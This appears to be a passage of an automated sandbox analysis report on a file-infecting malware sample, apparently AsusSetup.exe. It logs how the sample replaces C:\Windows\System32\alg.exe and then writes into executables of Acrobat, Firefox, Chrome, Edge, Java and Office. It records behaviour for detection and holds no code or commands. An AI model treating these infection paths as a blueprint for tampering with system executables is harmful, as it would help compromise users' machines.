Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Infects executable files (exe, dll, sys, html)
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
